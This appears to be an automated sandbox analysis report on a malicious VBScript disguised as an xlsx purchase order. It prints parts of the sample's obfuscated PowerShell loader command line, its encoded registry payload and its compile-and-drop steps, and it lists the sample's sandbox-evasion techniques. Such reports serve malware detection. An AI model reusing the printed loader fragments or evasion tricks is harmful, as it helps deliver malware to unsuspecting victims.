Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Binary string: ek8C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.pdb source: powershell.exe, 00000003.00000002.848043775.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Treetise\Fejltolkningens160\Helaftensfilmens", "cQGbcQGbuk1LEn5xAZvrAqcvgfJYOfUa6wLu1+sCofeBwitXGpvrAprL6wJhUesCrspxAZvr", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Saudiarabiske = """KoAEldMedPo-CeTph", "", "", "0")

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku			Jump to behavior

Compiles C# or VB.Net code

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline			Jump to behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Potential evasive VBS script found (use of timer() function in loop)

Source: Initial file

Initial file: do while timer-temp<sec

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 8552

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll

Jump to dropped file

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000003.00000002.848528611.0000000004E65000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.848528611.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ek:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: PO-09784893 xlsx.vbs	Binary or memory string: Vi5 = Vi5 & "PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf5"
Source: wscript.exe, 00000000.00000003.310056094.0000023F74611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.311867684.0000023F74614000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXznLUTAHANDLEX?lt?
Source: wscript.exe, 00000000.00000003.309917173.0000023F746D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf51i
Source: PO-09784893 xlsx.vbs	Binary or memory string: Vi5 = Vi5 & "gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXzn"
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ek:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V4

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

